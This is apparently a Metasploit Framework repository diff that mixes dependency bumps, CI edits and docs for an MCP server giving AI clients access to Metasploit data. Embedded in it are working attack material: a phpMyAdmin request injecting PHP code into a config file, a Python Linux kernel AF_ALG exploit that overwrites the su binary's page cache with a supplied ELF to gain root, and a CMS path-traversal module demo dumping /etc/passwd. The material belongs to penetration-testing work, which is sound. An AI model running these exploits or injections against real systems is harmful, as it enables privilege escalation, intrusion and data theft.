Content-Type: application/x-www-form-urlencoded
Cookie: phpMyAdmin=3d88785a775a6bdd4a4eee4d7ce5fe7b99a802bb; pma_lang=en-utf-8; pma_charset=utf-8; pma_mcrypt_iv=Mc1O5ByaScc%3D; phpMyAdmin=aeb5279f061348c557a7c366abb67deefe14b535
Content-Length: 109

token=e555e9ff29b23a81ff9d20affa616a8b&eol=unix&textconfig=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E&submit_save=Save
```
2026-03-31 07:07:49 +01:00
g0t mi1k cc3f76d586 phpmyadmin_config: Reformat code 2026-03-31 07:07:49 +01:00
g0t mi1k bf28b0d3e7 phpmyadmin_config: Add v3.1.x
As it turns out, this is part of CVE-2009-1285 (<= v3.1.3.1)
This does not exploit CVE-2009-1151 for v3.1.x
2026-03-31 07:07:49 +01:00
g0t mi1k d6914f0812 phpmyadmin_config: Reformat exploit 2026-03-31 07:07:41 +01:00
g0t mi1k 6cc3e391f7 phpmyadmin_config: Add check 2026-03-31 07:05:54 +01:00
BootstrapBool 31b58e7deb msftidy changes 2026-03-14 23:38:04 -04:00
BootstrapBool 5b9dc0f5ed Merge branch 'master' into camaleon_cms_cve_2024_46987 2026-03-14 23:33:27 -04:00
BootstrapBool aa2725150c Removes python camaleon module, adds ruby camaleon module
Updates documentation
2026-03-14 23:32:44 -04:00
BootstrapBool 25f6f6b7ae Moves camaleon_traversal module to auxiliary/gather
Adds missing options to documentation

Makes verbose option not required

Changes VHOST option type - some reason "address" type domain names were
marked as "invalid"
2026-03-07 18:36:36 -05:00
BootstrapBool d65cc5694f Adds camaleon_traversal module/documentation 2026-03-06 23:16:52 -05:00
1340 changed files with 28102 additions and 5309 deletions
@@ -284,21 +284,21 @@ jobs:
run: |
Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
dir
$InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
$WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
$Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
$process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
if ($process.ExitCode -eq 0) {
Write-Host "components have been successfully added"
} else {
Write-Host "components were not installed"
exit 1
}
Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
$r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
Write-Host $r
$r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
Write-Host $r
# $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
# $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
# $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
# $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
# if ($process.ExitCode -eq 0) {
# Write-Host "components have been successfully added"
# } else {
# Write-Host "components were not installed"
# exit 1
# }
# Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
# $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
# Write-Host $r
# $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
# Write-Host $r
working-directory: metasploit-payloads
- name: Build Windows payloads via Visual Studio 2025 Build (Windows)
+2
View File
@@ -53,5 +53,7 @@ group :test do
gem 'allure-rspec'
# Manipulate Time.now in specs
gem 'timecop'
# stub and set expectations on HTTP requests
gem 'webmock', '~> 3.18'
end
+24 -9
View File
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (6.4.128)
metasploit-framework (6.4.132)
aarch64
abbrev
actionpack (~> 7.2.0)
@@ -42,6 +42,7 @@ PATH
jsobfu
json
lru_redux
mcp (= 0.13.0)
metasm
metasploit-concern
metasploit-credential (>= 6.0.21)
@@ -223,6 +224,9 @@ GEM
concurrent-ruby (1.3.5)
connection_pool (2.5.4)
cookiejar (0.3.4)
crack (1.0.1)
bigdecimal
rexml
crass (1.0.6)
csv (3.3.2)
daemons (1.4.1)
@@ -281,6 +285,7 @@ GEM
gyoku (1.4.0)
builder (>= 2.1.2)
rexml (~> 3.0)
hashdiff (1.2.1)
hashery (2.1.2)
hrr_rb_ssh (0.4.2)
hrr_rb_ssh-ed25519 (0.4.2)
@@ -304,6 +309,9 @@ GEM
jsobfu (0.4.2)
rkelly-remix
json (2.15.1)
json-schema (6.2.0)
addressable (~> 2.8)
bigdecimal (>= 3.1, < 5)
language_server-protocol (3.17.0.5)
license_finder (5.11.1)
bundler
@@ -322,6 +330,8 @@ GEM
crass (~> 1.0.2)
nokogiri (>= 1.12.0)
lru_redux (1.1.0)
mcp (0.13.0)
json-schema (>= 4.1)
memory_profiler (1.1.0)
metasm (1.0.5)
metasploit-concern (5.0.5)
@@ -331,7 +341,7 @@ GEM
mutex_m
railties (~> 7.0)
zeitwerk
metasploit-credential (6.0.21)
metasploit-credential (6.0.23)
bigdecimal
csv
drb
@@ -353,17 +363,17 @@ GEM
mutex_m
railties (~> 7.0)
metasploit-payloads (2.0.245)
metasploit_data_models (6.0.15)
activerecord (~> 7.0)
activesupport (~> 7.0)
metasploit_data_models (6.0.18)
activerecord (>= 7.0, < 8.1)
activesupport (>= 7.0, < 8.1)
arel-helpers
bigdecimal
drb
metasploit-concern
metasploit-model (~> 5.0.4)
metasploit-model (>= 5.0.4)
mutex_m
pg
railties (~> 7.0)
railties (>= 7.0, < 8.1)
recog
webrick
metasploit_payloads-mettle (1.0.46)
@@ -498,7 +508,7 @@ GEM
rex-struct2
rex-text
rex-core (0.1.36)
rex-encoder (0.1.8)
rex-encoder (0.1.10)
metasm
rex-arch
rex-text
@@ -531,7 +541,7 @@ GEM
metasm
rex-core
rex-text
rex-socket (0.1.64)
rex-socket (0.1.65)
dnsruby
rex-core
rex-sslscan (0.1.13)
@@ -649,6 +659,10 @@ GEM
useragent (0.16.11)
warden (1.2.9)
rack (>= 2.0.9)
webmock (3.26.2)
addressable (>= 2.8.0)
crack (>= 0.3.2)
hashdiff (>= 0.4.0, < 2.0.0)
webrick (1.9.1)
websocket-driver (0.7.7)
base64
@@ -699,6 +713,7 @@ DEPENDENCIES
simplecov (= 0.18.2)
test-prof
timecop
webmock (~> 3.18)
yard
BUNDLED WITH
+7 -2
View File
@@ -39,6 +39,7 @@ coderay, 1.1.3, MIT
concurrent-ruby, 1.3.5, MIT
connection_pool, 2.5.4, MIT
cookiejar, 0.3.4, "Simplified BSD"
crack, 1.0.1, MIT
crass, 1.0.6, MIT
csv, 3.3.2, "ruby, Simplified BSD"
daemons, 1.4.1, MIT
@@ -71,6 +72,7 @@ forwardable, 1.3.3, "ruby, Simplified BSD"
getoptlong, 0.2.1, "ruby, Simplified BSD"
gssapi, 1.3.1, MIT
gyoku, 1.4.0, MIT
hashdiff, 1.2.1, MIT
hashery, 2.1.2, "Simplified BSD"
hrr_rb_ssh, 0.4.2, "Apache 2.0"
hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
@@ -85,6 +87,7 @@ irb, 1.15.2, "ruby, Simplified BSD"
jmespath, 1.6.2, "Apache 2.0"
jsobfu, 0.4.2, "New BSD"
json, 2.15.1, ruby
json-schema, 6.2.0, MIT
language_server-protocol, 3.17.0.5, MIT
license_finder, 5.11.1, MIT
lint_roller, 1.1.0, MIT
@@ -93,14 +96,15 @@ logger, 1.7.0, "ruby, Simplified BSD"
logging, 2.4.0, MIT
loofah, 2.24.1, MIT
lru_redux, 1.1.0, MIT
mcp, 0.13.0, "Apache 2.0"
memory_profiler, 1.1.0, MIT
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 5.0.5, "New BSD"
metasploit-credential, 6.0.21, "New BSD"
metasploit-framework, 6.4.128, "New BSD"
metasploit-framework, 6.4.132, "New BSD"
metasploit-model, 5.0.4, "New BSD"
metasploit-payloads, 2.0.245, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.15, "New BSD"
metasploit_data_models, 6.0.18, "New BSD"
metasploit_payloads-mettle, 1.0.46, "3-clause (or ""modified"") BSD"
method_source, 1.1.0, MIT
mime-types, 3.7.0, MIT
@@ -233,6 +237,7 @@ unicode-emoji, 4.1.0, MIT
unix-crypt, 1.3.1, 0BSD
useragent, 0.16.11, MIT
warden, 1.2.9, MIT
webmock, 3.26.2, MIT
webrick, 1.9.1, "ruby, Simplified BSD"
websocket-driver, 0.7.7, "Apache 2.0"
websocket-extensions, 0.1.5, "Apache 2.0"
+33
View File
@@ -0,0 +1,33 @@
# Metasploit RPC API connection (MessagePack)
msf_api:
type: messagepack
host: localhost
port: 55553
ssl: true
endpoint: /api/
user: msfuser
password: CHANGEME
auto_start_rpc: true # Automatically start the RPC server if not running (default: true)
# MCP server configuration
mcp:
transport: stdio # stdio (default) or http
# MCP server network configuration (for HTTP transport only)
host: localhost # Host to bind to (default: localhost)
port: 3000 # Port to listen on (default: 3000)
# Rate limiting (optional - defaults shown)
rate_limit:
enabled: true
requests_per_minute: 60
# If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
# For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
# but then would be limited to 5 requests per minute thereafter.
burst_size: 10
# Logging (optional - defaults shown)
logging:
enabled: false
level: INFO # DEBUG, INFO, WARN, ERROR
log_file: ~/.msf4/logs/msfmcp.log
sanitize: true
+32
View File
@@ -0,0 +1,32 @@
# Metasploit RPC API connection (JSON-RPC)
msf_api:
type: json-rpc
host: localhost
port: 8081
ssl: true
endpoint: /api/v1/json-rpc
token: YOUR_BEARER_TOKEN_HERE
# auto_start_rpc is not supported for JSON-RPC (only MessagePack)
# MCP server configuration
mcp:
transport: stdio # stdio (default) or http
# MCP server network configuration (for HTTP transport only)
host: localhost # Host to bind to (default: localhost)
port: 3000 # Port to listen on (default: 3000)
# Rate limiting (optional - defaults shown)
rate_limit:
enabled: true
requests_per_minute: 60
# If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
# For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
# but then would be limited to 5 requests per minute thereafter.
burst_size: 10
# Logging (optional - defaults shown)
logging:
enabled: false
level: INFO # DEBUG, INFO, WARN, ERROR
log_file: ~/.msf4/logs/msfmcp.log
sanitize: true
File diff suppressed because one or more lines are too long
+33
View File
@@ -0,0 +1,33 @@
#!/usr/bin/env python3
import os
import socket
import sys
AF_ALG = 38
ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"
def check():
if not os.path.exists('/proc/crypto'):
print('[-] /proc/crypto is missing.')
return
try:
s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
except OSError as e:
print('[-] AF_ALG socket family unavailable (' + e.strerror + ').')
return
try:
s.bind(("aead", ALG_NAME))
except OSError as e:
print('[-] ' + repr(ALG_NAME) + ' can not be instantiated (' + e.strerror + ').')
return
finally:
s.close()
print('[+] The exploit socket has been created, encryption primitives are available.')
return True
if __name__ == '__main__':
if not check():
sys.exit(1)
@@ -0,0 +1,9 @@
import os
import shutil
su_path = shutil.which('su')
su_fd = os.open(su_path, os.O_RDONLY)
try:
os.posix_fadvise(su_fd, 0, 0, os.POSIX_FADV_DONTNEED)
finally:
os.close(su_fd)
+56
View File
@@ -0,0 +1,56 @@
#!/usr/bin/env python3
import os
import base64
import shutil
import socket
import sys
import zlib
AF_ALG = 38
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5
SOL_ALG = 279
def setup_sock():
sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
sock.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "0" * 64))
sock.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
op_sock, _ = sock.accept()
return op_sock
def write(op_sock, su_fd, offset, chunk):
op_sock.sendmsg(
[b"A" * 4 + chunk],
[
(SOL_ALG, ALG_SET_OP, b'\x00\x00\x00\x00'),
(SOL_ALG, ALG_SET_IV, b'\x10' + b'\x00' * 19),
(SOL_ALG, ALG_SET_AEAD_ASSOCLEN, b'\x08\x00\x00\x00')
],
32768
)
r, w = os.pipe()
os.splice(su_fd, w, offset + 4, offset_src=0)
os.splice(r, op_sock.fileno(), offset + 4)
try:
op_sock.recv(8 + offset)
except:
pass
su_path = shutil.which('su')
su_fd = os.open(su_path, os.O_RDONLY)
try:
elf = zlib.decompress(base64.standard_b64decode(sys.argv[1]))
except:
print('[-] failed to load the ELF executable from the argument, it must be base64+gzip')
sys.exit(os.EX_USAGE)
op_sock = setup_sock()
for i in range(0, len(elf), 4):
write(op_sock, su_fd, i, elf[i:i + 4])
op_sock.close()
os.execvp(su_path, ["su"] + sys.argv[1:])
+1649 -1260
View File
File diff suppressed because it is too large Load Diff
+3 -1
View File
@@ -10,7 +10,7 @@
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema[7.2].define(version: 2026_01_30_124052) do
ActiveRecord::Schema[7.2].define(version: 2026_04_11_000000) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
@@ -665,6 +665,8 @@ ActiveRecord::Schema[7.2].define(version: 2026_01_30_124052) do
t.integer "session_id"
t.integer "loot_id"
t.text "fail_detail"
t.string "check_code"
t.text "check_detail"
end
create_table "vuln_details", id: :serial, force: :cascade do |t|
@@ -0,0 +1,366 @@
The Metasploit MCP Server (`msfmcpd`) provides AI applications with secure, structured access to Metasploit Framework data through the [Model Context Protocol](https://modelcontextprotocol.io/) (MCP). It acts as a middleware layer between AI clients (such as Claude, Cursor, or custom agents) and Metasploit, exposing 8 standardized tools for querying reconnaissance data and searching modules.
This initial implementation is **read-only**. Only tools that query data (modules, hosts, services, vulnerabilities, etc.) are available. Tools for module execution, session interaction, and database modifications will be added in a future iteration.
## Architecture
```mermaid
flowchart TD
ai_app["AI Application<br>(Claude, Cursor, etc.)"]
subgraph msfmcp_server["MsfMcp Server"]
mcp_layer["MCP Layer (8 Tools)<br>Input Validation / Rate Limiting / Response Transformation"]
rpc_manager["RPC Manager<br>Auto-detect / Auto-start / Lifecycle Management"]
api_client["Metasploit API Client<br>MessagePack RPC (port 55553) / JSON-RPC (port 8081)<br>Session Management"]
mcp_layer --> rpc_manager
rpc_manager --> api_client
end
msf["Metasploit Framework<br>(msfrpcd)"]
ai_app -- "MCP Protocol (stdio or HTTP)<br>JSON-RPC 2.0" --> mcp_layer
api_client -- "HTTP/HTTPS" --> msf
```
## Quick Start
The simplest way to start the MCP server is with no arguments:
```
./msfmcpd
```
The server automatically detects whether a Metasploit RPC server is already running on the configured port. If not, it starts one automatically with randomly generated credentials.
To use specific credentials:
```
./msfmcpd --user your_username --password your_password
```
## Configuration
### Configuration File
Copy the example configuration and edit it:
```
cp config/mcp_config.yaml.example config/mcp_config.yaml
```
A MessagePack RPC configuration looks like this:
```yaml
msf_api:
type: messagepack
host: localhost
port: 55553
ssl: true
endpoint: /api/
user: msfuser
password: CHANGEME
auto_start_rpc: true
mcp:
transport: stdio
rate_limit:
enabled: true
requests_per_minute: 60
burst_size: 10
logging:
enabled: false
level: INFO
log_file: msfmcp.log
```
For JSON-RPC with bearer token authentication, use the JSON-RPC example instead:
```
cp config/mcp_config_jsonrpc.yaml.example config/mcp_config.yaml
```
### Command-Line Options
```
./msfmcpd --help
Options:
--config PATH Path to configuration file
--enable-logging Enable file logging with sanitization
--log-file PATH Log file path (overrides config file)
--user USER MSF API username (for MessagePack auth)
--password PASS MSF API password (for MessagePack auth)
--no-auto-start-rpc Disable automatic RPC server startup
--mcp-transport TRANSPORT MCP server transport type ('stdio' or 'http')
-h, --help Show this help message
-v, --version Show version information
```
### Environment Variable Overrides
All configuration settings can be overridden by environment variables:
| Variable | Description |
|---|---|
| `MSF_API_TYPE` | Connection type (`messagepack` or `json-rpc`) |
| `MSF_API_HOST` | Metasploit RPC API host |
| `MSF_API_PORT` | Metasploit RPC API port |
| `MSF_API_SSL` | Use SSL for Metasploit RPC API (`true` or `false`) |
| `MSF_API_ENDPOINT` | Metasploit RPC API endpoint |
| `MSF_API_USER` | RPC API username (for MessagePack auth) |
| `MSF_API_PASSWORD` | RPC API password (for MessagePack auth) |
| `MSF_API_TOKEN` | RPC API token (for JSON-RPC auth) |
| `MSF_AUTO_START_RPC` | Auto-start RPC server (`true` or `false`) |
| `MSF_MCP_TRANSPORT` | MCP transport type (`stdio` or `http`) |
| `MSF_MCP_HOST` | MCP server host (for HTTP transport) |
| `MSF_MCP_PORT` | MCP server port (for HTTP transport) |
Example using environment variables:
```
MSF_API_HOST=192.168.33.44 ./msfmcpd --config ./config/mcp_config.yaml
```
## Automatic RPC Server Management
When using MessagePack RPC on localhost, the MCP server can automatically manage the Metasploit RPC server lifecycle. This is enabled by default.
### How It Works
1. **Detection**: On startup, the MCP server probes the configured RPC port to check if a server is already running.
2. **Auto-start**: If no server is detected, it spawns the `msfrpcd` executable as a child process.
3. **Credentials**: If no username and password are provided, random credentials are generated automatically and used for both the RPC server and client authentication.
4. **Wait**: After starting, it polls the port until the RPC server becomes available (timeout: 30 seconds).
5. **Shutdown**: When the MCP server shuts down (via Ctrl+C or SIGTERM), it cleans up the managed RPC process.
**Note**: If an RPC server is already running, credentials must be provided via `--user`/`--password`, config file, or environment variables to authenticate with it.
### Database Support
The auto-started RPC server creates a framework instance with database support enabled by default. If the database is not running when the RPC server starts, a warning is displayed:
```
[WARNING] Database is not available. Some MCP tools that rely on the database will not work.
[WARNING] Start the database and restart the MCP server to enable full functionality.
```
Tools that query the database (`msf_host_info`, `msf_service_info`, `msf_vulnerability_info`, `msf_note_info`, `msf_credential_info`, `msf_loot_info`) require a running database. To initialize and start the database:
```
msfdb init
msfdb start
```
Then restart the MCP server.
### Disabling Auto-Start
Auto-start can be disabled in three ways:
- CLI flag: `--no-auto-start-rpc`
- Config file: `auto_start_rpc: false` in the `msf_api` section
- Environment variable: `MSF_AUTO_START_RPC=false`
Auto-start is also not available when:
- The API type is `json-rpc` (requires SSL certificates and a web server)
- The host is a remote address (cannot start a server on a remote machine)
When auto-start is disabled and no RPC server is running, you must start `msfrpcd` manually:
```
msfrpcd -U your_username -P your_password -p 55553
```
## MCP Tools
The server exposes 8 tools to AI applications via the MCP protocol.
### msf_search_modules
Search for Metasploit modules by keywords, CVE IDs, or module names.
- `query` (string, required): Search terms (e.g., `windows smb`, `CVE-2017-0144`)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_module_info
Get detailed information about a specific Metasploit module.
- `type` (string, required): Module type (`exploit`, `auxiliary`, `post`, `payload`, `encoder`, `nop`)
- `name` (string, required): Module path (e.g., `windows/smb/ms17_010_eternalblue`)
Returns complete module details including options, targets, references, and authors.
### msf_host_info
Query discovered hosts from the Metasploit database.
- `workspace` (string, optional): Workspace name (default: `default`)
- `addresses` (string, optional): Filter by IP/CIDR (e.g., `192.168.1.0/24`)
- `only_up` (boolean, optional): Only return alive hosts (default: false)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_service_info
Query discovered services on hosts.
- `workspace` (string, optional): Workspace name
- `names` (string, optional): Filter by service names, comma-separated (e.g., `http`, `ldap,ssh`)
- `host` (string, optional): Filter by host IP
- `ports` (string, optional): Filter by port or range (e.g., `80,443` or `1-1024`)
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
- `only_up` (boolean, optional): Only return running services (default: false)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_vulnerability_info
Query discovered vulnerabilities.
- `workspace` (string, optional): Workspace name
- `names` (array of strings, optional): Filter by vulnerability names (exact, case-sensitive module names)
- `host` (string, optional): Filter by host IP
- `ports` (string, optional): Filter by port or range
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_note_info
Query notes stored in the database.
- `workspace` (string, optional): Workspace name
- `type` (string, optional): Filter by note type (e.g., `ssl.certificate`, `smb.fingerprint`)
- `host` (string, optional): Filter by host IP
- `ports` (string, optional): Filter by port or range
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_credential_info
Query discovered credentials.
- `workspace` (string, optional): Workspace name
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_loot_info
Query collected loot (files, data dumps).
- `workspace` (string, optional): Workspace name
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
## Integration with AI Applications
Add the MCP server to your AI application configuration. The exact format depends on the client.
### Claude Desktop / Cursor
```json
{
"mcpServers": {
"metasploit": {
"command": "/path/to/metasploit-framework/msfmcpd",
"args": [
"--config",
"/path/to/config/mcp_config.yaml"
],
"env": {}
}
}
}
```
### Using RVM
If you use RVM to manage Ruby versions, specify the full path to RVM so the correct Ruby and gemset are used:
```json
{
"mcpServers": {
"metasploit": {
"command": "/your/home_dir/.rvm/bin/rvm",
"args": [
"in",
"/path/to/metasploit-framework",
"do",
"./msfmcpd",
"--config",
"config/mcp_config.yaml"
]
}
}
}
```
## Security Considerations
### Input Validation
All tool parameters are validated against strict JSON schemas. IP addresses are validated using Ruby's `IPAddr` class with CIDR support, workspace names are restricted to alphanumeric characters plus underscore/hyphen, port ranges are validated (1-65535), and search queries are limited to 500 characters.
### Credential Management
Configuration files should use `chmod 600` permissions. Credentials are transmitted securely to the Metasploit Framework API and are never cached or logged by the MCP server.
### Rate Limiting
The server applies rate limiting to all MCP tools using a token bucket algorithm. Default: 60 requests per minute with a burst of 10 requests. This is configurable in the `rate_limit` section of the configuration file.
### Logging
Logging is disabled by default. When enabled (via `--enable-logging` or config), sensitive data (passwords, tokens, API keys) is automatically redacted. Log files should be protected with `chmod 600`.
### Error Handling
Stack traces are never exposed to clients. Error messages are sanitized to avoid leaking credentials. Metasploit API errors are wrapped in the MCP error format.
## Testing with MCP Inspector
The [MCP Inspector](https://github.com/modelcontextprotocol/inspector) is an interactive developer tool for testing and debugging MCP servers. It runs directly through `npx`:
```
npx @modelcontextprotocol/inspector
```
## Troubleshooting
### Connection Refused or Timeout
1. Verify the RPC daemon is running: `ps aux | grep msfrpcd`
2. Check the port is listening: `netstat -an | grep 55553`
3. Test connectivity: `curl -k -v https://localhost:55553/api/`
### Authentication Failures
For MessagePack RPC, verify the username and password in your configuration file or CLI arguments. For JSON-RPC, verify the bearer token is valid and has not expired.
### Database Not Available
If database-dependent tools return errors, ensure the database is running:
```
msfdb init
msfdb start
```
Then restart the MCP server.
### Rate Limit Exceeded
Increase the rate limit in your configuration file:
```yaml
rate_limit:
requests_per_minute: 120
burst_size: 20
```
+3
View File
@@ -448,6 +448,9 @@ NAVIGATION_CONFIG = [
{
path: 'How-to-use-Metasploit-with-ngrok.md'
},
{
path: 'How-to-use-Metasploit-MCP-Server.md'
},
]
},
]
@@ -0,0 +1,216 @@
## Vulnerable Application
This module attempts to read files from an authenticated directory traversal vuln in Camaleon CMS versions <= 2.8.0 and version 2.9.0.
CVE-2024-46987 mistakenly indicates that versions 2.8.1 and 2.8.2 are also vulnerable, however this is not the case.
## Setup
See [Camaleon CMS](https://github.com/owen2345/camaleon-cms) documentation.
The following describes how to setup Camaleon CMS version 2.8.0 on Ubuntu.
### Requirements
- Rails 6.1+
- PostgreSQL, MySQL 5+ or SQlite
- Ruby 3.0+
- Imagemagick
### Install Ruby
guides.rubyonrails.org/install_ruby_on_rails.html
~~~bash
sudo apt install build-essential rustc libssl-dev libyaml-dev zlib1g-dev libgmp-dev git curl
~~~
### Install Mise
~~~bash
curl https://mise.run | sh
echo "eval \"\$(~/.local/bin/mise activate)\"" >> ~/.bashrc
source ~/.bashrc
~~~
### Install Ruby with Mise
~~~bash
$ mise use -g ruby@3.0
$ ruby --version
ruby 3.0.7p220 ...
~~~
### Install Imagemagick
~~~bash
sudo apt install --no-install-recommends imagemagick
~~~
### Install Postgresql
~~~bash
sudo apt install postgresql
~~~
### Install Rails
~~~bash
$ gem install rails -v 6.1
~~~
#### concurrent-ruby Issue
Downgrade concurrent-ruby to 1.3.4
~~~bash
$ gem list concurrent-ruby
concurrent-ruby (1.3.6)
$ gem install concurrent-ruby -v 1.3.4
$ gem uninstall concurrent-ruby -v 1.3.6
$ rails --version
Rails 6.1.7.10
~~~
### Create Rails Project
Run `rails new camaleon_project`
### Gemfile
In your Gemfile do the following:
Replace `gem 'spring'` with `gem 'spring', '4.2.1'`
Delete this line to prevent [conflict](https://github.com/owen2345/camaleon-cms/issues/1111): `gem 'sass-rails', '>= 6'`
Put these lines at the bottom of your Gemfile:
~~~
gem 'camaleon_cms', '2.8.0'
gem 'concurrent-ruby', '1.3.4'
~~~
### Install Bundle
From the project directory run `bundle install`
### Webpacker.yml Issue
~~~bash
wget -O camaleon_project/config/webpacker.yml https://raw.githubusercontent.com/rails/webpacker/master/lib/install/config/webpacker.yml
~~~
### Camaleon CMS Installation
~~~bash
rails generate camaleon_cms:install
rake camaleon_cms:generate_migrations
rake db:migrate
~~~
### Run Rails
~~~bash
bundle exec rails server -b 0.0.0.0
~~~
Navigate to `http://{ip address}:3000` and enter test under the Name field.
### Setup Server
When prompted with the new installation page just enter "test" into the Name field and continue.
#### Create Unprivileged User (Optional)
Navigate to `http://{ip address}:3000/admin` - login with the default admin credentials "admin:admin123"
Then navigate to "Users -> + Add User" and fill out the form.
## Verification Steps
1. Do: `use auxiliary/gather/camaleon_download_private_file`
2. Do: `set RHOST [IP]`
3. Do: `run`
## Options
### FILEPATH
The filepath of the file to read.
### DEPTH
The number of "../" appended to the filename. Default is 13
## Scenarios
```
msf > use auxiliary/gather/camaleon_download_private_file
msf auxiliary(gather/camaleon_download_private_file) > set rhost 10.0.0.45
rhost => 10.0.0.45
msf auxiliary(gather/camaleon_download_private_file) > set rport 3000
rport => 3000
msf auxiliary(gather/camaleon_download_private_file) > set ssl false
ssl => false
msf auxiliary(gather/camaleon_download_private_file) > run
[*] Running module against 10.0.0.45
[+] /etc/passwd stored as '/home/kali/.msf4/loot/20260411192711_default_10.0.0.45_camaleon.travers_926890.txt'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:996:996:systemd Time Synchronization:/:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
syslog:x:102:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:991:991:systemd Resolver:/:/usr/sbin/nologin
uuidd:x:103:103::/run/uuidd:/usr/sbin/nologin
usbmux:x:104:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
tss:x:105:105:TPM software stack,,,:/var/lib/tpm:/bin/false
systemd-oom:x:990:990:systemd Userspace OOM Killer:/:/usr/sbin/nologin
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
whoopsie:x:107:109::/nonexistent:/bin/false
dnsmasq:x:999:65534:dnsmasq:/var/lib/misc:/usr/sbin/nologin
avahi:x:108:111:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
tcpdump:x:109:112::/nonexistent:/usr/sbin/nologin
sssd:x:110:113:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
cups-pk-helper:x:112:114:user for cups-pk-helper service,,,:/nonexistent:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
saned:x:113:116::/var/lib/saned:/usr/sbin/nologin
